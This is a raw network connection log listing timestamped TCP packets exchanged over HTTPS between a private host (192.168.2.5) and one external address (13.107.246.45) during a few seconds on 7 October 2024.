Oct 7, 2024 03:15:56.285124063 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.285583973 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.285599947 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.286046982 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.286052942 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.286468029 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.286545038 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.286596060 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.286696911 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.286716938 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.286729097 CEST	49940	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.286734104 CEST	443	49940	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.289267063 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.289302111 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.289388895 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.289642096 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.289655924 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.389380932 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.389542103 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.389599085 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.389692068 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.389712095 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.389744043 CEST	49941	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.389750957 CEST	443	49941	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.392739058 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.392836094 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.392925978 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.393080950 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.393117905 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.429832935 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.430423975 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.430433989 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.430947065 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.430952072 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.529334068 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.529491901 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.529565096 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.529766083 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.529783010 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.529793978 CEST	49942	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.529799938 CEST	443	49942	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.538151026 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.538197041 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.538295984 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.538431883 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.538446903 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.555886030 CEST	49938	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.555908918 CEST	443	49938	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.898616076 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.898622990 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.940447092 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.946490049 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.955276012 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.959088087 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.959103107 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.963038921 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.963043928 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.984889030 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.984934092 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.988372087 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:56.988384008 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:56.993345022 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.056855917 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.060153008 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.060364962 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.061006069 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.084333897 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.084408998 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.084486961 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.084506989 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.084563971 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.084609985 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.102736950 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.161454916 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.161487103 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.161878109 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.161884069 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.162127972 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.162149906 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.162159920 CEST	49945	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.162166119 CEST	443	49945	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.163975954 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.164006948 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.164365053 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.164371014 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.164530993 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.164547920 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.164561987 CEST	49944	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.164566994 CEST	443	49944	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.171736956 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.171788931 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.171848059 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.171964884 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.171976089 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.173512936 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.173537970 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.173616886 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.173825026 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.173839092 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.175229073 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.175543070 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.175564051 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.175959110 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.175964117 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.262914896 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263206959 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263221025 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263400078 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.263438940 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.263451099 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263458014 CEST	49946	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.263465881 CEST	443	49946	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263722897 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263768911 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263823032 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.263860941 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.263878107 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.263890028 CEST	49947	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.263896942 CEST	443	49947	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.267545938 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.267576933 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.267652035 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.267874002 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.267880917 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.267968893 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.267982960 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.268044949 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.268244982 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.268254042 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.273755074 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.274007082 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.274116039 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.274166107 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.274173975 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.274192095 CEST	49948	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.274194956 CEST	443	49948	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.277050018 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.277093887 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.277146101 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.277352095 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.277365923 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.824142933 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.824640989 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.824687958 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.825140953 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.825148106 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.843288898 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.843833923 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.843846083 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.844522953 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.844530106 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.906449080 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.906876087 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.906913996 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.907655954 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.907665968 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.924031019 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.924181938 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.924253941 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.924320936 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.924340010 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.924370050 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.926995039 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.928775072 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.928795099 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.928812981 CEST	49949	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.928818941 CEST	443	49949	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.929106951 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.929116011 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.929321051 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.929943085 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.929948092 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.930351019 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.930386066 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.930784941 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.930792093 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.932267904 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.932305098 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.932374001 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.932549953 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.932562113 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.947283983 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.947498083 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.947550058 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.947702885 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.947712898 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.947721004 CEST	49950	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.947726011 CEST	443	49950	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.950582981 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.950634003 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:57.950695992 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.950865984 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:57.950881958 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.004010916 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.004256010 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.004376888 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.004424095 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.004452944 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.004467964 CEST	49952	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.004475117 CEST	443	49952	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.007107019 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.007147074 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.007205963 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.007358074 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.007369995 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.027753115 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.027898073 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.027951002 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.027951956 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.028002977 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.028105974 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.028114080 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.028124094 CEST	49953	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.028130054 CEST	443	49953	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.030601025 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.030620098 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.030699015 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.030905008 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.030914068 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.032306910 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.032423019 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.032476902 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.032531977 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.032550097 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.032562017 CEST	49951	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.032567024 CEST	443	49951	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.034868002 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.034908056 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.034966946 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.035137892 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.035152912 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.582550049 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.583017111 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.583055973 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.583551884 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.583569050 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.592979908 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.593492985 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.593524933 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.594118118 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.594127893 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.646913052 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.647361040 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.647375107 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.648073912 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.648078918 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.682099104 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.682584047 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.682602882 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.683146000 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.683298111 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.683303118 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.683326006 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.683403969 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.683604002 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.683624983 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.683640003 CEST	49955	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.683645010 CEST	443	49955	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.684900999 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.686141014 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.686203003 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.686449051 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.686672926 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.686709881 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.686741114 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.686754942 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.687202930 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.687207937 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.691039085 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.691184044 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.691291094 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.691370010 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.691389084 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.691404104 CEST	49956	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.691409111 CEST	443	49956	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.693476915 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.693512917 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.694149017 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.694243908 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.694257975 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.745666027 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.745687008 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.745769024 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.745804071 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.745979071 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.746042013 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.746066093 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.746076107 CEST	49957	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.746088982 CEST	443	49957	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.748878002 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.748930931 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.749043941 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.749203920 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.749227047 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.781889915 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.782032967 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.782186985 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.782215118 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.782215118 CEST	49958	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.782224894 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.782232046 CEST	443	49958	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.784796953 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.784821987 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.784976959 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.785123110 CEST	49963	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.785135031 CEST	443	49963	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.786319017 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.786339045 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.786406994 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.786403894 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.786530972 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.786606073 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.786606073 CEST	49959	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.786639929 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.786664963 CEST	443	49959	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.788806915 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.788849115 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:58.789021015 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.789145947 CEST	49964	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:58.789160967 CEST	443	49964	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.333585024 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.334167957 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.334203005 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.334597111 CEST	49960	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.334603071 CEST	443	49960	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.380125999 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.380640984 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.380652905 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.381005049 CEST	49961	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.381011009 CEST	443	49961	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.399223089 CEST	443	49962	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:59.399883986 CEST	49962	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:59.399897099 CEST	443	49962	13.107.246.45	192.168.2.5
